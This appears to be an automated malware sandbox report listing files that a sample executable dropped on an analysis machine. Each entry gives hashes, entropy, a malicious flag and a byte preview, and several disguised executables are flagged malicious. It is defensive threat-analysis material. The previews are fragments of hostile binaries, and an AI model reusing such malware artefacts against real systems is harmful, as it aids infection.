Preview:	regf...,...0<.&3........S._....3.G{Y...@...~].\|7.z80...i._.W....br.Z...=..\....C.KBh......h...U."...c.(..KF\|+%.9r#t..cB...K\|...5..U.AJo....c0.......).'.=..4........h5..r0.w..k...7%i..T...:...a..x..i..2....@tC...R....H..._K.....F..^.b...H..3........8.(Sl....]....X..\|.......Ip..6..%.....'.E......Mn%zo.kx_...GDW.%Y4...m.e^yN.....A..IT"...\|a..I.AWu.......V.<.YL5 ...@..$..V..0.]......K=...`.)..U......pgqIH?#BW..n`.^ge...q..r...>....F/....Q.Q.w..-..H..._\..K.T-K.O.....Bp..Q..6....\y...M....hh..m...P.zH{.../.~..... ...k.W...j,.;...;Z`.Ej..`.... ...?.."y...F8.K.).Cd.b..<..&N........5.D@....^.=..T.q.?)rP..4.Qz;....9m...U.a....f&..y;...w......w..Rs..#..}.OA..Y....!.<n.0:.1[.L..D&....;.@...cS..A..A.._....a;=..9.3..........BdV....4!.tvlE.V..p...\|..D...p...).A>%..x.\....3....i.0.K.i1.,.-.....O.....P....0.'E@.+..kY../.0...S.....#.._].?=..\|.9..zKyi2VilfY.of[b.....X......A.reU.:..._...$>:.......G:l.rS...E.H......%N.8t?..F0h.Q......=.{...'...?.1I^.

C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.97917337982561
Encrypted:	false
SSDEEP:	192:P703CI1djAnnZhjIU7L45gV1nKoxHXUf/hQABPrIgH1yk:g3VdjAnHkU/4GV1nKox3U3hdBJH8k
MD5:	F1EFBCE453D52724D146C3B537B1437B
SHA1:	33306ACC14A29798825A370B90443FF067519BD0
SHA-256:	F3FC7BCDAC88FCBA22F87A69BC248A9DA804C0E9B68CBBF3069C10296D6F46D8
SHA-512:	E40DF79258BC83D1D3F24ABB450FAF763DB7A50FA72354E2276CB8C322E802DA8887CEC5BB53DC1033198DA686D298B994D13D2BF726F9B5757ACF20067110CD
Malicious:	false
Reputation:	unknown
Preview:	regf...3.~\|......X..../..K5~AC...>C....~..&...O.....v../..^}.I`...Ed5.........]9..>.Zy......d.9.'.C.f.].fZ.cEF.a....N..<.{.........N...w...uf..W@"..S....t..........!.<.8v'fW.g....[n.P.1Y.s.+.Ja.U.U..........!.....K.. .9.&.../pto.W.I\|..A.....'.7&....u.;\|./V.^....Eb..C.....$.%3...... ]c.....Y.@............v...Th...~R....n.i...#.9uH......C1..r...i...\.t............J..$`..._[...nlr.j.....Oz4....p..G$.S..m../......i..U.c.xz3o....o.a.9.........d.....J.b...N>.^f.^..@bQ..^.2.q.j!...~...F3.c....s..,......_.L.B.~=5.v.w.J5S..}....W..4..n...e..6\C.K.........1H......ku.....`..P.q..G..9.W..x.._..\|...o.....P...N9.}j<.n..A<.#.pJ/ ..QXh{...<...{M...x.upy\|.%`...Z.....<.G......t+_. .....2...v..p........cY..a.......z.........}....R.%.G.... ...OY..$3...:I..y........!........y.i..]%....v.a'.F.;.q...^..-m./.:$..7f.6+p..\.6..z.....S&'..;.3.....o)=......^5..J..".4... .....Np%..}.2..E.....i.Ou..B...^t.a.......@K/.....4...~.rJ..c..@.D..8@...5../........Hd.X...

C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978923005542611
Encrypted:	false
SSDEEP:	192:j5geh0moa9HhgFatuaWOGNav3XENPX6ibPDmXgORs9+:FFtoBcuabGNavSPKCmJRs9+
MD5:	1FE78878E8DD85205FB0E8A90EF6F30F
SHA1:	92F2DBDD7323E863B127F08A0023B067527DB252
SHA-256:	A280AC8114833C2911538A794F37BF0F0809EE2600BA6E4674433A966107BFAE
SHA-512:	C74CF6D8CD0EE9BF4A1EE2B75D5AED5D40F9872476F3E1BD0471AC2DD1D51F7A331B0017F9BF63EE29A805E631A78E2D2B28863A60468D43DC41C1A90A17E642
Malicious:	false
Reputation:	unknown
Preview:	regf...ba...).L.)..X.US......D" }.<..X..d0..J.....N...s-....t....}.Y.{...Ff.`...\I...J...m..8W..).K..4..H\...%..L..........h}W...\|....1...(.\|.D.....@...{....X.B}.r.g.....f.0z.D.!......+C/bm....8..=............v.Kh.VO<...~n. ...In....q..nce.....1R............@.bt.:..........Pt`!86.(s._.d<.i>.t.{...}..WZ~.NTy...b&.d....dk~....=...4.......iz..2..Jjk...l!+.d(...&.Z.>.....MFaa....)"Ji.J......FK.2.=....W.y.V..E..\.$S.);....d.g..Q... [\|....iOD8S#.r..=.....^._/.`.........KJ.].~.....A....#..B...&.;%I.....wL....v...\7fC!.Om&NyaC..ph.B....5......S...z...).\|...5.\.x.F.q..C.J...N...QQ9mHt..Uc......0.8..{.[....oI..4._.w9&....:..#b7.)...e:i...^...<..m...b.....`.z.:.j...8.....q..k..Gu'3d.[..ft.BQ./S...!..MK...by...*1.!....I...N..(.....8.....[.TN...0....uOKW.5.4......W7...YAl.......T!cW.b...Zw.. ~+..U...e.M....9.E.]#..:b;...YE..7.....S.8.vJ.6.]R.r..7...f~...Ci...M.S..c.&.q...p_.."~.(......`e.....?...o.9.zv..v.....?.J.4....F..c..Z...x.@..=F...2...?..3.#.V

C:\Users\user\AppData\Local\Temp\AdobeARM.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5108
Entropy (8bit):	7.956563378801129
Encrypted:	false
SSDEEP:	96:oZo608iHpa5522XNxpIJ4nSkOlxRHwbU7Z9rRD10gleIynlFzXGRn4bF/Vkn2R:S08iaZXi4MlrQbuld3yFFCW
MD5:	D6306B72BA984FC5FAA7CA7E4F462BCE
SHA1:	1B54BB63346C3D43010BEF4F0643863CF3E950CD
SHA-256:	DD925160419C50E0BD341387DBEE13E150C129F52680E26E6373C818B7773B70
SHA-512:	44ED23D6ECCABEDCB65ECBB407221B31BFE410AA7FE30155B644F13506AEF1D1B92FE8DDFB1BB1253A7D9AD9810C41EE97D7BC68DBF4A539BFE8B2581CDCDB3A
Malicious:	false
Reputation:	unknown
Preview:	[2020a.L. .>?.7....<8..K..J...b..6U...J..I.@.....T..S.kNy.d.q...ld.}...p...\|v..;.gin.g.....`...@i..........\fiH.....He.g%....Hh......W..W.&nr0....d..V....S...uFX..nD.C.....K?.r....]....K..M.....!.#.A.+.. .....cX.by.j.I.J..C....n..~y..:l.Ru..$I$......I...3.g....s..f.4.8l%.....@.v1t.A...3jl.../...u}..0a.#.J.h\.{.....n.#./.J. V.Nr...%..8gP..>........?.....gj...k.h>.%j..5.;...........R.6d.fz...{.3........R..k2r.~x...j.D.n..]...y..}N.....S.........V]B-..du......\|.:......o..%.&vS..V:....`\|..a.., .Bj.?.?...%...;........k...6....Dpr..}h.I..2n....!+...7'...c....t.L.F.......a./Zw\|....E.G.n..ZS....Z.....X...u.%...J.(..=[..9.z........=d~h.x..zu`q....)c.Z.yL^..F.h6.b,..Z.9.0.J.{.P.9..\|l.-..8..o)I..6Q.EK.l...B.Oz....B...@..F;1b%H..Kza.X6f..B.R..'q)......[C-]B\......H.u.....F..:...1..\|a.......7tV..\.....?...)..q.l.gt_R.......k.M'b.S.}..U,.}.<A....I.......F...!..Ec...>a.T..2.L..fis.ki.!.l...f.^tA=X.g.z....G..ap.ap..?.33....S.9.J.;..A.C@c...E.$...

C:\Users\user\AppData\Local\Temp\CR_4BAC1.tmp\setup.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2674494
Entropy (8bit):	6.684916097994651
Encrypted:	false
SSDEEP:	49152:A3R1lRf+yAHLvThf0we+9fPF0RkBOETd4rR:MbbAHPFDp4N
MD5:	2854245555F8FED5E73205400AA04C66
SHA1:	2804A09479BE885EDA2FB7EDD2B04A4B91CBEDE1
SHA-256:	7C5B4095413DC1873F0CA49CBFC46D67124EFAF6AB14B8B13C28C46ED7FD3D23
SHA-512:	28B738D5A5F93FDBC6FE29EF9276997220B1B2CDC1410E073307464D2970485FE66713C6440F8EE68DCECBE94EE94025EE8B4DF11A32DA56150A7AB4356FC969
Malicious:	true
Reputation:	unknown
Preview:	MZx.......OZ. .......n..W...X/a<.......`.?..J)..?..z..v.n..^.ZN............C..j\.Ek..t$F..Y.&r} .......2".....;..PE..O......R.i7x.^...B^W:..is.O..h4~%7.[C.......W.....!.ys...SP..K...q)+.......oz.j..+V3y ]b.........z...+C.<.4n...2.`+9.k..H.>.......d.).....u....M.>p._Mb..>)>.nh......W.a6$...c>.`_W...........4...F"........T..K].3^\|'F(}.5..go.E6+vb.6a.....j.#..=.'........=.x...b..J.@ .#d.~..U.f...y!.o......l...u..6kcH......M....L...VR..ZR.W,.{.ktp~.........E......&.....Y>xfA...#.R... .+....tZ+..5;K.!.Lix..d..'.GZ....\|.,.tgl..8..0....z\H..w.D:..I.....+H.g'.c.....BA9...b...,.W6z.....X...8q..........].E.P....m.4l...u......q...3....1x.....&...[5...&..Z..'..8.K.J.......O>.Y..\.w.I0L.M..QVj....~..Wj.m.)rw...Y.\6$(t.........{.H......2.mJ...].0{.%..l...N...'......{l..........G}.,a..j..59...X.z@x.\Y..j..6. .,F.E....j.c..8..T.(....O/j..0...+..l..u..)..M..r..x..q/1%8.2....,.}.g.....J..j<.......[.2..A.......<R.7.I;3.4.6E.......

C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	144390
Entropy (8bit):	7.9987398031502215
Encrypted:	true
SSDEEP:	3072:62J/GkQWfSI28HllE1GTr/XN4tAdCC+zfhsVQtoR:BJekQWfSXQlE261zfhsxR
MD5:	441B267077DC0310B60682BDC6D09809
SHA1:	9C94D2E68F7DEFB8A0A1AC22FCA85DBA9C962C9B
SHA-256:	EDDB1D46A8E707B146038AD9321BCFE0622274B9C9198AA7A5286A1D2A19BB98
SHA-512:	1B173BA0CE36C3DE165D8001FDC12FD8FB9166559786B53B50AEAF6678C503F14E91FFC9A9A1B5BA7B36B7FEEA16E3BF04FB29BB05FA7340ED8206F4E335B187
Malicious:	true
Reputation:	unknown
Preview:	MZ...r2..?Zw.c.eSu.(.,p!(LAC.t..`P...\.U..o..o...&g=....KL..;....^.l.f=.z.T!..^+.....W.7.1...!...o....o?qF......!>..,.."FV.Jc..C...u......o.0.O....a.}H.../..r.#.s.......b.R..p....!.... ..C[..{....`..e.(..I.vCkr...O.......>p?.:.S......T.2.k..\w.6..U......7.lm.R../r@...q...&.W....9.@3u{.n..N...G..m....,~.K....B...._#...G.....<7x..T.^..kSW..A..j....k.M.W..E.c...`..)..85..`...8..).W..O..../...#].O.Kr.A.0..5.gI........*..$....QY... .3.........U...U7Uv.47.Gp..T.z..7.+...n...7.L.N..F...O.c....._..P.K.?.~+...hsq.(?..-9%..... h..2..5@._S+C.1.y?.iw.g...u#....<....m=..{e.I.o..........T.t...>..'.o..'.i..6dG ...=j..R..!\...9..@.K..I..3......$O.PS2L`G....o.#.%A..D....{..rOz.fG.....R....Z(.w...G.%..O.G1)L"l@Y.c`...N.C.kABS..H...Wqz...yKT.,..9.p.;..r...L.I..~:...h....y:L.Q7.Q9[.c.L .<..l....]:...9...R.......w.....9...)J$..m8...=.J..d.l...w.vcA.@A3.X...........e.]1..........k+Q......\|....h.... .r.e.....X.r< ......a..Y..c.@....(......z2-.#%.E%

C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	18766
Entropy (8bit):	7.990134034584143
Encrypted:	true
SSDEEP:	384:wkNnbONeOumu+hPWPtjxbu5jSE3Ukjk4daVosFImiysbq7SmLQyApIA:RBSIqh+XbaWEf44gIrofLQBpIA
MD5:	81750D6C89098F13F1E7E9E1A2440711
SHA1:	52AB43E2478EC79FA38E541D198F2F15BEF5E625
SHA-256:	13A3C954B7C101F6794A3111E097B3DF7A5E4F3648E32952C1B62986F4C7CCA5
SHA-512:	47E9B686AC909AA13B77B11B7491CBE758CA30B38DC8AB5FB970CCCFB185A57C175E36FE08381874644052A90BC0240960B37C9162FADFB29817CC4D19BE5026
Malicious:	true
Reputation:	unknown
Preview:	MZ...D..r.~.Xi......A..~<..U.tw.a.P...P.pq.....L5.4G..b..} SS..j-.......F.fC#..t.J.x....T-....CdI:...cz...q.q..x.=`.#1j......\|._[.H..t.....{..t.>p.j.xvzW./....[.~.H.'...Bx..C.j2.0..2..G..._[y..H.8.<../4.2].t.s...>C..I[H..K2..,2..NR.....F..@.d../.....+.#.......#N..9NT..!..Bj.'%..y..T.....v...x#.....:#..g..m.E].=y.......6..... gM1...UL....).........D.`.R...]..X...bd.p..2......]1........C...t/..p...{.....`...;.X....w.._..6,.1M..N..&!#.h:\.......(.\/....b....v..A.\|q...h4<:oL=..I.-.q..=hf...bd..Dy.z..A&.e}.P..".."Y\.V........~.....e.A....x.7B......QR....c..P....gNPK:.-..~.yU5..6$).h...%_Y...........814....A......g....0..8Y..5......H..$G.U.... ...=.....4......q...9.r.].......2X.C..~.oq....i.PA{'......Jsy5.......EO...I.....L#./...}.$........=.=...*.../.c{W<.#..2....I...>..I..r-.[..]LC..=..g.].J...7-..'..@..g!.C.mSm`l....B/._......U)?MdOAG.(.Z;..(.].\k`!f..wv..L...[^..q0....;7..M..+...Z....t.p..c.l..........7....H(...=..X..$..^.\|./..!P

C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979272146885903
Encrypted:	false
SSDEEP:	192:OMl/ltOWYiUl3qvE3bpHSw54foKLIZguKm7hCHpP:OKtMF1aE3I3hsZpKShupP
MD5:	495BE6637A9EA7794BA5940952082A04
SHA1:	0BE7416B24C902E449685E440DD19732CD6B3827
SHA-256:	B0CD5876D0D6C151920423F4A15CE89BF0B2EA41B4331DDFBFCE956A9EA76070
SHA-512:	5AAA0AF6CD2592AAA9FB48E252E5F091D490DD2F282ED9FB458FC5E1E36DF7ED7D322D7FC16A97FAEB2B5C9FBA52C94F497824E608E260DC9157B3893C5B6C3D
Malicious:	true
Reputation:	unknown
Preview:	MZ...........N.U..Tv5..?...g.W3a..h.g.s...e...L.)...t.z.v=......SQe."v.>...:...T7.^h..3=.{uuh."..tN.z).c.9..r<.;v>....Zb.0'..2n.......C..8.y.9c.#c...J..S..(u.....2....G..m.\.H.T.@....[9..N..L...XZ....1..S...$.e..J..%nb...C9.b..........7..yJ..#o.M.q..y.x 0..l.....t.c..cn/....B...Z..j...I..O`.6X0.w,.. ......O....4".]W.)......V..9\.+^6.G.0....MI..T]J...#=tH.ny..E...&.Ul..sj."4n.W.:f...F...=.\|..'...2.K..?..6.I.mMC.uo.3\G.O.p...9$.&.J;`...wC..9r)~......7.2.v.[.6B.....ez..)z...l.U...>.#..4v5...d{Xfa.\|......k....W.&..j...G....b..^>.&.".a.>.k....o7@......x{.....#J.m..!,9.wW...n.J./hO......{..7UM.[..jM.%..B..@&^B..(.. ...IQ~.2G.%%..}..9. E...5....I.....].......t..6-.r...Bo.y..,$5G5.....e.......d......\b.k..~N.L..Dh..:.0.{o@o...@/. ._.\|.o...].'.....ha.U.d.}..7..].m...A.Lt.C..2n.......;xWo3v....Lz(_.Y.....$[?..c.lj..R.4e...F....}h..k.......U.v..J...i....a<..p.-U....Y..+.8.g.D.....<./D.,Q.....D..P.N..tg.huU.. ...[_......J....]P..<gE/.>u{...

C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CbsProvider.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	51534
Entropy (8bit):	7.995881398209108
Encrypted:	true
SSDEEP:	768:eN8vyZflOaTNYtSZY5InOGtMAQvly1g/Cd5/t3DZNY8adsubOAqsAOlcPgipmxdA:eyEcaTNCS1gKNbY/iu8jjmnA
MD5:	6771C89CBC97B9C01ECAF346ED5775F4
SHA1:	48DEDEF8D30DFC108CE54CBB44F2D3674EAA5608
SHA-256:	991D32E33301F225629B680F809F3EEAD84E674552D5A0157997A319FDD5AD23
SHA-512:	DDACACF115DC64A05819D4B0B17DDC469DEF3B75F53994293A123B80A2060254B830BB92B545E7FA28A93849AFDC3ECFB748103C04C6AC31EC34C37C05F96087
Malicious:	true
Reputation:	unknown
Preview:	MZ....MI\|.}.~/`..E[...$.;.s...].)....S.).../.#VT....+...M..a....+r.T8......=sP.v$......xy..}&....J..-i...=q.bW..8.b.(.;..`fy......~.y..o....o.^#T.]....4! ].a...,.....W.Q.~L..PG..uZ.W..... N._R.i+..\b.[h..v..A...h...m;.ji3.........<-~.4..]=.~..(A..~.I.:..1.....>.#.iJ.M.....]je.9.g/U9.m<).'6.....h.+.D....r2\|.6.`J..F..{..I.U.f.l~3....e..W..Q...B/b.?..M.se/}.e...n>#.."G..../\...@.]rOeu.yFSi6;...{..T:..8..I2......7..`#fpC...b...Q.ez...7-...U.d...g.&j...WUK2\..:.........\L.......k<..Cj..!...I^G#....1../H.V(S(...G$".=.+.o:.(G..P..F#R....>FR...U_\|.?..@.">;.M.^....F\|S.Q.~.[!...r...B..K......;...7.f.....d7.N.#.73./.z(LQE...#.j.;M..Q@...k+.$9....1,..._.I...-O"F..$.....={w.7.O"N.Cy.kUS..G......9U'....r..Y.....k......h. ..5.lJ`V.R9..b...'..)R...!z..eP.h.F..t.X...CN.s.....t.N@.\.GN.x&u...U^..Bd.P..N..c...5.O.[....8..u...q..9.V...;..#y..o.B..7.S.r.v....h..6...a.....>.j...gy..0c..p+..1.U..n.. .p...4i..]2.-....D@.0..G.fN."c.......v...z..PnI..&..U.~.F...\|..

C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	13134
Entropy (8bit):	7.985316289461209
Encrypted:	false
SSDEEP:	384:jBmFVHGroxreMMCW5djGDdTYI9o66XNR+Q/2TYH:jB9oxyMAdj6EpT0MH
MD5:	992AE3CA2AACFC9BC1CE633DB9DB0745
SHA1:	B303D418248DD8C39914CF1586E6767B201F569F
SHA-256:	20321403F6A2FE35996A0EDF81766631E7476630B911DDE96E71DF9EB6325544
SHA-512:	9BE21161F1CED47C73B3778448CB82FB290D70E1C12245D0DAAB014A523EAE6998EBB2CD3D8122D7EAC74BDBEB20C7F315DF301A4B16111F27F3B8925E9600D7
Malicious:	true
Reputation:	unknown
Preview:	MZ....m..qNW ..I.....'5$..(.-g..t9.c.n.~.u1.0.;k..6.8..i.V"...q..4.U...^M\.[!H.>C.T..5...j...'T\|$....3"..-$...L....N0.=(....9R8.r<h\|C..._...q.N..6...9.....j.a_..g]..PqT...s...%qSe...D.c.......#qa.7....jNEf.....Q.D..vysU%.O.. .@.g..7v..E.<...._"2e....8..".-...O(....,.;.ax....@....>....^....^..A.a.a.K.R<......V...2>4b.&..{...n..;..k.#T..9c:'.q0......."~.p1...c...j.'8#O..9I.z...{.A...C.[1.....R......h....F.!.x.Q1....r......j..DKl......9..z6+..6.y...C..m .....2..........O.._..E......>.q.zK....u....8#)\|m..?........'...U7N.FU...\|oL../..-........cZe.t.}..S..}.rc....7....#..j....#.S..e.0Dk..qQ@ae...8nF.....Lzw>a(.)'X].ah.w..b...8.mL...f.L............xk..?3.\|a.XAW....r....AI.(...H....^..p.;...f.......-+.{e....otY........2k......{............?......J.7.:...d.j...L.h..Q....YH.k..I..yE.........D.f...?.]..xe...9.&=..6e...0.]a.....'. ....7.8..^d.....h.j5b]\..e.)c..5..q.......B.\.t..E..0...\..d1..D...f....9..U../U....y.3.....9.....Hk;..J...b=

C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismCore.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	8014
Entropy (8bit):	7.975948198311155
Encrypted:	false
SSDEEP:	192:VVfFwjlKYxFGKT4+TMmpLf+MJZhIf08ZR1zBvFv:7fFwjRT3TMs6MHI04t1B
MD5:	04671575AF0D634721A5FA9C2FFBAB7A
SHA1:	66D0303B35438530BB1CB80A4ABDCF25E67E263B
SHA-256:	83E17ED507ECE62D9FF2CE1E98687E1BC189963CB8011020ED923F1D30189F2F
SHA-512:	6C1915B71EBD1E47228FDD7E576A1DBE936365EC1684EB7E00DE8CE0FA109A1EE52DB4B8BFF51C6C8328995C7B439CA07885914596794E033AD03D124AD4FCC8
Malicious:	true
Reputation:	unknown
Preview:	MZ.............B....V..)DE+...o...5...B....@A.......)W.#.1+H..`...qZ...8g.c..X..........>.Lp}.e....Qf.BY..?.....Y0.9.....x..m....W......v\|U..E....,&...-......Q.Hxh.........#.Qb.41.O..4.c..R.n.5K.../...@">@.....2...6.Wy.V....f....u..Q..u...g.!.....n.^&/..%M.....\'.Bd.&..Cq.RM..R#@.1t..v...-..X.........a..^g..}x..Q.z.2.b.......~.I=3...\..}R.U.Rz.....V...\.k.3..0.......D..P.P..?.W........?.{9........$J.J=....B5....F...BN.X...7K2....uFN+..z`.&._.u.th.-......wd.I.^\m..)o...]e..4e.7...y.h/...-L..._a.....HD.;...i.9B.K..J..R......R...Ty?A.). Q......jo.....u.v.K.]D.J.B...../XP..b..)O.>3A....[.!Nz..S.&...F.D.,/.m...$9..+.......^o$2.Is..JRb.($u[....o.D."..(.RN.c.;...{F..8....I.l..n...P.}...[.I..\|q.Q...G..{.7=#+zFO..I..%......\.......H..F.c..... ..Qs[O{..v.8.+z.kDj...}.....n1..W..w&vF.a..d..Pp.@p.m...x.d....l{L.A..>.Z.j.S..DfW-....dy........a.0..A{...-.i.W.;.w$<.v.XH...b..;...].Z){..j....m.....t...$s...7..#.l%g.M.5..j.%:Z..~D3..R....)....R.&a..

C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2894
Entropy (8bit):	7.940976197399187
Encrypted:	false
SSDEEP:	48:7wxWxubim63s+AhO01Yeg3tX1+610SXPr+hCfpPRllKdZE1hI0XLX/fiTcl29sIk:7wt+e+AhO28X1+i6hIR/b1/XLCG2Kv
MD5:	551B4FDB07F35C6E28DA64D03B9CE9D3
SHA1:	DE41017494CA2739DF6EF4DE3463EB4A284EDDA3
SHA-256:	547F9F064C99C356ABB154F070FC19F4187AD2853B434BB4C94A8E0B02BA3A7F
SHA-512:	EC739BD008E2C713566052B427C3512B556BCBA7D3214786E0C2394F04F075E75E0751FDB746A55AA02477F85482EFE4970B5D2F8CA8095C44CF9FA1BCB1644B
Malicious:	true
Reputation:	unknown
Preview:	MZ.....e.`5..O...G.&...`5@p0O.L.9.S8V%0EI....(......8.^Eo..x....f..].....;.\|..S.&./.?....9...:.u\.Wc9..-.c.9Po.~...KV...t2....kO..._3..1Q.......P_.....Z]b..<O.3,xN.'.m7.(..ln.w..E....cU`.......F..'......<.......C.J..5.e...@..J?t.p....y.?...H...??.".(..&r..D.(.0....@.a.t<Zd..l......].w1.Y...<.....L;..r....X0'8../(-..U.%....H.6'V0....h.I......~8.JhLY.d..m..I.../..\| .V.CKUf.&.$....N..........Z.$<W.....}.@a.:.{\|C}..!R._.A.q.3...o...v..K.".ub.c..5b.E.mf....Q.vX.rA....%.3Z..m.E....7..f~F5..Ga.In@.Kl.?..J......I...v6.l......X.v.-.fD...9!.L.3B8f.-.@.?_m.U..:.Q.^...D..I.....#3.d..u.Anu....[..Aq..2H...M...RQ=..A..v..-..!..Y...D.....o......HZ..f.J...f.ca...WS.>.=Wr8n.Tt...l.C..6@0....7.;4C....uD.......\.5Wxm....y.3....5q....{.._.K...P<........l.i..-.9.....bv.P..Y2.......b\|o...I..)l(..`..&...@&..(.#...b..w....[.Ll...d.UV%.`.l.t.S'.9P..u..B.l.&./......C.....E....}.k0.8=m!...."3...3..7.R<....^B....a.a.....B./%.....%..F.C..... ..3..PG..gc.sx

C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	18254
Entropy (8bit):	7.990156680036601
Encrypted:	true
SSDEEP:	384:9RKH4NUbC603IyHUGdUhajAhaUhzkoQGOHn4u1aCxAnCitH6i:pxvIZqUhvaNaOYGaQ4XR
MD5:	501D0BF8B67E13D5AD5B532564E1EB03
SHA1:	2A12558D7AB8D43AFEBA28EB4F7D8EC37C3A8985
SHA-256:	48E31450CF57C584C09E174BB5CD7FDE711A21DE0EE75F531F3F1DEC895FC168
SHA-512:	FEFD29D6CDBF231E7256BF77D061B595C5E1331148D3EA5BF282C417842501BFEC2C2B6338C00C1236C5C9CBAA24EDA50A47CA6BA1DB3ED83B31668DE772DCB2
Malicious:	true
Reputation:	unknown
Preview:	MZ...$i.=./_........N.m...hs......N.0...0..f..ze.H.~..,..r2w.W.]\|C..(xO}...O!.\|......pX).6..b......@..#X.K07.L...{.HO.:.2...$.Mm....=..Z..m.].#..].....p.mx...@.....e.............`....j.8.Q...._...!wO.T....e....1qT.`..tk'L}.. ......[.r&5...d.j.....C+e....q..1.;..U.+.I.OX..N..b'....._I{l.V".....qp...;.h.B......9.xE.V.l.KP2.9.....m.....e..g.B.;.._.].)J^7..vS.t..z..7..+....L.Z...w...=.."...F..%.x...7.q.D.d..<.Ze.........V..R.S..Q&..\|..w./.'\|..`....E.Z?.yl.T.rp..Q-..c[WS.;.E..W!....l.z..q.e....1....[..z\|.....w.#g.a9P..o.HG.K:L..>......3=!..B.XT....K.OH.=R..5..........S.\...\7.F..M.\....a....D.Y.."...NP.,.L..i.....#$.....\1>V{..^..R...Y.z.\|.C...zP(.~..-2.P.4Zs.N...o..P.G .i7Q.-D.NT1..W!..h;UCW....\..<O8...::Td.......P,sK.s...(..:b.~..V..&!,....Nc./...e1....:..!..K..b.bT>nj.=8.O.~.l5.=...K.f.vE.....3..>r..V.,Et....@2.. !rU.t.....Y....~zK..{2....[...,....L...{..s.q.SO..5....>.....sN.q..L..+.I.\....-...l<......{...../.H......5..kHb"....;o.-$}_.

C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	9038
Entropy (8bit):	7.977155548861648
Encrypted:	false
SSDEEP:	192:f+ecJzg1r0oQguSWdx/3I3vl8HoqY6TjyhLQK+U:Dc0rnu7j/3I/leoqYYALXP
MD5:	C46D5D2D2522C03BEA9E455C141D726D
SHA1:	F967CA1483E421EA022C913277C05708CF24F45B
SHA-256:	E39231C7F7194CFD2FE62D6C32054DA85F550723FCF2958E6FC421FFC5E1A0C6
SHA-512:	D0CF948ADD2F19EF31CA6496CAF08564C71AD5838FBA7DEC6ECA012CC2080F8517296DD5E1480F7D2B6A9D59C86B40F7B474D3AA9ECA5C7C2E48B4BE121B3372
Malicious:	true
Reputation:	unknown
Preview:	MZ...<...R....0...@:...i..41~q5...:..{......&.#...A.<.j8..J............qB.g..nM...+Eyj..# .-A........y...Z..........\|....c.;..aOh..."....T..,..J.s...\.c...Ni3.....>....2....$.CXm..W.......W8.K....&......q..(...%..l.y...l....s.vR^.-.........c%.x!....PU......u\.........:...V....3..h.Y.$ -...k\)..d....4>...1[...Jz...c.[{/.,'....;..a.....>(.$D_>.R..S..,.(..C.A....L.iuX.M.;....FY...G.\&.Y!...w"..X.n...6...yzmnq..G}.J,..6....].......['.UR[......ps.y.&......X.....$2....c.M..........X......<v..\~\|m.ud...T.4....O 7b$F..<....`[.zd.`....%j.xu.dJ..i......nY}2u?<...p.fl.0nX.......?.]...m.<.\|..i........E..1B.Z..o.../R..5..5.....df.y.I..'yI.[\|C.D'_......k.....6..0N...". ..+-.y......P..}..U.>Q.3.]....Q.Y>..j...'.zo{..n1....n.K...VR..%Y.CL..i.......5...ra.W_..U....?...6..'......Q..L.g.d...h.>.c..I...Q."5...E..R..D.3r.3..1U._..,......p...p..,....)..a{...i..+.Q....ct...g/..h ......k...B[X.Y......T...$..E.-..'D..F.x.G;.@...3..:.mEy.7......

C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FolderProvider.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	2894
